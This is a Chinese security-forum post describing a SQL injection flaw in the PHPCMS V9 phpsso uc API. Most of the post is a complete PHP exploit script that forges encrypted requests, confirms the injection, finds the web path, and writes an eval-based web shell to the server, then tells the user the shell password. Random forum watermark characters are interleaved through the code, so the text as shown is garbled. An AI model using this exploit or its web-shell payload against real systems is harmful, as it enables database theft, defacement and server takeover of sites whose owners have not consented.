中国网络渗透测试联盟

标题: PHPCMS V9 uc API SQL注入漏洞 [打印本页]

---

作者: admin    时间: 2013-2-9 01:22
标题: PHPCMS V9 uc API SQL注入漏洞
PHPCMS V9版于2010年推出，是应用较为广泛的建站工具。第三方数据显示，目前使用PHPCMS V9搭建的网站数量多达数十万个，包括联合国儿童基金会等机构网站，以及大批企业网站均使用PHPCMS V9搭建和维护。
5 i; q3 l  g# X+ z- l
所有使用PHPCMSV9搭建的网站均存在SQL注入漏洞，可能使黑客利用漏洞篡改网页、窃取数据库，甚至控制服务器。未启用ucenter服务的情况下，uc_key为空，define('UC_KEY', pc_base::load_config('system', 'uc_key'));deleteuser接口存在SQL注入漏洞。若MYSQL具有权限，可直接get webshell。

9 g; I/ e- _. {# B漏洞分析：
1.未启用ucenter服务的情况下uc_key为空
define('UC_KEY', pc_base::load_config('system', 'uc_key'));
) G: Y# r9 S1 u2 i+ d2. deleteuser接口存在SQL注入漏洞，UC算法加密的参数无惧GPC,程序员未意识到$get['ids']会存在SQL注入情况。
' A( K8 G- p- i& D8 B3 V    public function deleteuser($get,$post) {
        pc_base::load_app_func('global', 'admin');
% |# Z( e: m) c* {8 Q6 u& r        pc_base::load_app_class('messagequeue', 'admin' , 0);
        $ids = new_stripslashes($get['ids']);
        $s = $this->member_db->select("ucuserid in ($ids)", "uid");
SQL语句为
SELECT `uid` FROM `phpcmsv9`.`v9_sso_members` WHERE ucuserid in ($ids)

利用代码，随便拼了个EXP，找路径正则写得很挫有BUG，没有注其他表了，懒得改了，MYSQL有权限的话直接get webshell
, V7 E5 [+ z8 M& Q<?php
print_r('
" E; n3 ^  b7 H- ^% p---------------------------------------------------------------------------
- z; Q2 v; W9 O" t% cPHPcms (v9 or Old Version) uc api sql injection 0day
! |( |( W1 a8 U4 H6 S8 A* Iby rayh4c#80sec.com
, z9 j0 K* S8 W/ G---------------------------------------------------------------------------
');

  k' M+ L4 }! t/ R/ vif ($argc<3) {
    print_r('
2 @# d: Q' ~; h/ t: f. \; N---------------------------------------------------------------------------
% t& X$ }8 k: g; u4 i: C; W' a' o, OUsage: php '.$argv[0].' host path OPTIONS
host:      target server (ip/hostname)
3 ]. _1 F, i, W9 ^- E% jpath:      path to phpcms
1 _  V2 u3 a/ D# ^) A6 F( R5 _Options:
! u* b7 r+ ]$ e% `- e -p[port]:    specify a port other than 80
-P[ip:port]: specify a proxy
Example:
2 L6 f2 B, t+ I3 n9 \( Lphp '.$argv[0].' localhost /
- q7 n5 F/ W; {0 P$ c6 ophp '.$argv[0].' localhost /phpcms/ -p81
php '.$argv[0].' localhost /phpcms/ -P1.1.1.1:80
---------------------------------------------------------------------------
6 r% S8 s4 F3 m');
& |) A6 M! h8 R1 |/ u  i    die;
, {" E' j& Y5 z" k- L7 M  K}
% `2 E  c* B; C( g% \4 m
error_reporting(7);
ini_set("max_execution_time",0);
$ u. f  C+ p7 M* Oini_set("default_socket_timeout",5);

function quick_dump($string)
{
  $result='';$exa='';$cont=0;
. Y0 s$ S4 c" Y6 T$ e* J: W+ R  for ($i=0; $i<=strlen($string)-1; $i++)
1 @+ \; l! `9 s1 C6 [  {
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
4 [" N! r! F* W, G. ]! C5 Z+ N8 E   {$result.="  .";}
   else
+ _4 |% ?4 p: k5 G' E# W9 q   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
$ D3 t3 a  E: ~  m9 a   else
" }9 t/ u1 \* W& |2 x& l   {$exa.=" 0".dechex(ord($string[$i]));}
. \" [0 r+ b/ x- c9 N+ r8 |+ B; j3 [   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
7 f) \1 ]! o6 @  Q* H- D  z  }
" X/ m' @2 M4 c0 a$ K! w return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
# s  S% a. J4 y$ i7 G
function send($packet)
0 Q$ m! o# t; t2 v{
' [3 y" V6 G5 Q% J9 K+ ^' g) p  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
! J( P/ t8 [7 y$ B4 f; M  ]    $ock=fsockopen(gethostbyname($host),$port);
. E' N5 x1 N/ `. G" R# O    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  E  X% m( V" V! a8 W  }
! f* E) y/ c, b8 j3 f, {  else {
        $c = preg_match($proxy_regex,$proxy);
' d2 o( R, A2 ?. v4 a* Q3 W* |    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
* R4 J  J1 `4 h% f    $parts=explode(':',$proxy);
& ^7 O8 _2 |8 Y% N6 C' B$ \    $parts[1]=(int)$parts[1];
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
: O" H" j3 l4 P( [5 H: f    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
6 P$ n. q2 O3 h" F; L        }
2 M1 p+ o( Q6 h  }
7 Z  t9 V% V; r6 i, j4 h  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
0 M! [, p. e' e% k3 I4 e    while (!feof($ock)) {
& C, h5 J! ~' Q) N      $html.=fgets($ock);
: _* D2 o: ^) x( Q8 R    }
  }
% o/ i9 N5 b/ [' X  else {
$ z0 a5 y( h1 F) Q! @    $html='';
) T  t* E9 y( h' x    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
% H+ ]" h9 ?5 b! N    }
  }
  fclose($ock);
}

$host=$argv[1];
$path=$argv[2];
5 L7 O& y# f4 I- |' o1 V: X$port=80;
$proxy="";
5 @/ h4 @$ E9 W+ L' \/ w- sfor ($i=3; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
" f" G4 x. J$ N! H, Wif ($temp=="-p")
{
% o9 }: @: f; e* X6 y  $port=(int)str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
) P$ u& m0 V' N3 F+ D{
- T6 X5 X. x/ z% b$ F+ v  $proxy=str_replace("-P","",$argv[$i]);
( @2 s8 N% A& _- P3 g) k! v}
}
; m7 k; Q# K& ^# [5 Q' J( A
8 f4 Y) D: A% C  T, z5 Tif (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
6 X9 z% {, I0 G# {
function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {

    $ckey_length = 4;
5 ]4 Q9 j! |7 F/ ]8 u
    $key = md5($key ? $key : '');
- ?2 \& U7 \  O0 n* W    $keya = md5(substr($key, 0, 16));
    $keyb = md5(substr($key, 16, 16));
    $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';

: V- c8 o! p* j( E! R0 A. K    $cryptkey = $keya.md5($keya.$keyc);
8 E$ ~4 J- H6 T$ O' G    $key_length = strlen($cryptkey);

    $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
    $string_length = strlen($string);

    $result = '';
/ e2 L& f0 W/ R' K/ v- t    $box = range(0, 255);

) K0 D  l/ f$ ^2 s    $rndkey = array();
    for($i = 0; $i <= 255; $i++) {
& {% Q1 M* U8 Z; ^: z+ E3 B' R        $rndkey[$i] = ord($cryptkey[$i % $key_length]);
    }
( ~* i( y. v/ f  w+ d
    for($j = $i = 0; $i < 256; $i++) {
        $j = ($j + $box[$i] + $rndkey[$i]) % 256;
        $tmp = $box[$i];
        $box[$i] = $box[$j];
" c$ a/ |! f' s2 Y8 f5 E        $box[$j] = $tmp;
    }
, v& m2 V5 J  \* X
, E1 T8 |3 G# L# g) I! P5 [    for($a = $j = $i = 0; $i < $string_length; $i++) {
' g/ [! E; g" ~6 a( t( C- Q        $a = ($a + 1) % 256;
        $j = ($j + $box[$a]) % 256;
        $tmp = $box[$a];
        $box[$a] = $box[$j];
        $box[$j] = $tmp;
0 U& q) F/ |5 U( Y        $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
% |7 i9 q% u/ U& }    }

    if($operation == 'DECODE') {
        if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
            return substr($result, 26);
" l1 F( W( i! M. L        } else {
. q; W$ e. c! |* N            return '';
        }
    } else {
        return $keyc.str_replace('=', '', base64_encode($result));
& O/ ?3 |  {! K% g7 ~9 ~    }

) z9 H" F/ C& |0 U# _) e6 Y) D}
2 E0 C% m1 |1 \. X
4 y. y; T$ b9 }6 ~: l8 o0 n* I$SQL = "time=999999999999999999999999&ids=1'&action=deleteuser";
: g. F1 x4 V1 ]8 ?" B$SQL = urlencode(authcode($SQL, "ENCODE", ""));
echo "[1] 访问 http://".$host.$p."phpsso_server/api/uc.php?code=".$SQL."\n";
$packet ="GET ".$p."phpsso_server/api/uc.php?code=".$SQL." HTTP/1.0\r\n";
; f1 J( M. G! `* r. F7 W$packet.="User-Agent: Mozilla/5.0\r\n";
4 S' d+ B2 z% E4 t% D$ K: H$packet.="Host: ".$host."\r\n";
5 W  Y* f1 q) [+ e/ e$packet.="Connection: Close\r\n\r\n";
6 z( j  R6 w7 @# f0 B1 g, [- F- Asend($packet);
+ {: g, q1 M6 w5 N7 Lif(strpos($html,"MySQL Errno") > 0){
echo "[2] 发现存在SQL注入漏洞"."\n";
echo "[3] 访问 http://".$host.$p."phpsso_server/api/logout.php \n";
$packet ="GET ".$p."phpsso_server/api/logout.php"." HTTP/1.0\r\n";
! D) s, `. M& G& k- m) j9 E+ ?$packet.="User-Agent: Mozilla/5.0\r\n";
# [" w5 i4 x. U8 u% f$ f$packet.="Host: ".$host."\r\n";
6 e; s5 f3 g4 k3 D- h* \$packet.="Connection: Close\r\n\r\n";
send($packet);
. J7 u) j% M- I& N7 P3 I. Kpreg_match('/[A-Za-z]?[:]?[\/\x5c][^<^>]+[\/\x5c]phpsso_server[\/\x5c]/',$html, $matches);
//print_r($matches);
if(!empty($matches)){
6 j7 v4 d: J6 J  x+ Techo "[4] 得到web路径 " . $matches[0]."\n";
' T( i! B& c4 t: E9 eecho "[5] 尝试写入文件 ". str_replace("\\","/",$matches[0]) ."caches/shell.php"."\n";
$SQL = "time=999999999999999999999999&ids=1)";
$SQL.=" and 1=2 union select '<?php eval($"."_REQUEST[a]);?>' into outfile '". str_replace("\\","/",$matches[0]) ."caches/shell.php'#";
$SQL.="&action=deleteuser";
) l; C/ x' F( d( K$ B& ]4 e$SQL = urlencode(authcode($SQL, "ENCODE", ""));
8 x% o8 V& X/ n5 q, d* q5 Yecho "[6] 访问 http://".$host.$p."phpsso_server/api/uc.php?code=".$SQL."\n";
8 `/ v8 y1 i6 S# s$packet ="GET ".$p."phpsso_server/api/uc.php?code=".$SQL." HTTP/1.0\r\n";
$packet.="User-Agent: Mozilla/5.0\r\n";
$packet.="Host: ".$host."\r\n";
, d/ r0 a( y$ L: D* f* ^$ S6 y5 H$packet.="Connection: Close\r\n\r\n";
7 ~2 W; ~8 f0 ysend($packet);
if(strpos($html,"Access denied") > 0){
( x5 I9 \3 `, o8 F5 oecho "[-] MYSQL权限过低 禁止写入文件 ";
6 X3 `2 L0 f3 z8 C, S7 ~. M5 zdie;
/ K+ f, y' o0 i. k7 A% q}
5 l# j0 ^6 e& P7 K3 Mecho "[6] 访问 http://".$host.$p."phpsso_server/caches/shell.php"."\n";
9 ?+ S6 A% ?# ]2 L0 U" j1 ~$packet ="GET ".$p."phpsso_server/caches/shell.php?a=phpinfo(); HTTP/1.0\r\n";
- K& s% G9 J0 H# ~+ [6 l- b$packet.="User-Agent: Mozilla/5.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
& c) q2 V2 o( K) }7 A/ ]# Usend($packet);
7 N( t1 g- R6 I6 ?9 Eif(strpos($html,"<title>phpinfo()</title>") > 0){
echo "[7] 测试phpinfo成功！shell密码是a ! enjoy it ";
6 Y  a) H7 l" A' K) |( e# z1 p}
4 R  c. |. g+ \- z& p7 d: }  s}else{
) n) c+ F/ m6 C1 C5 aecho "[-]未取到web路径 ";
}
' R; Q" s6 @2 U% ^& P. S}else{
7 @  g+ u4 C  n# g* Y- v; techo "[*]不存在SQL注入漏洞"."\n";
, T2 o( V7 H$ Y}
5 `+ P4 b0 o; ]5 d
0 Q& K2 I# d8 w# x( L/ h?>

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2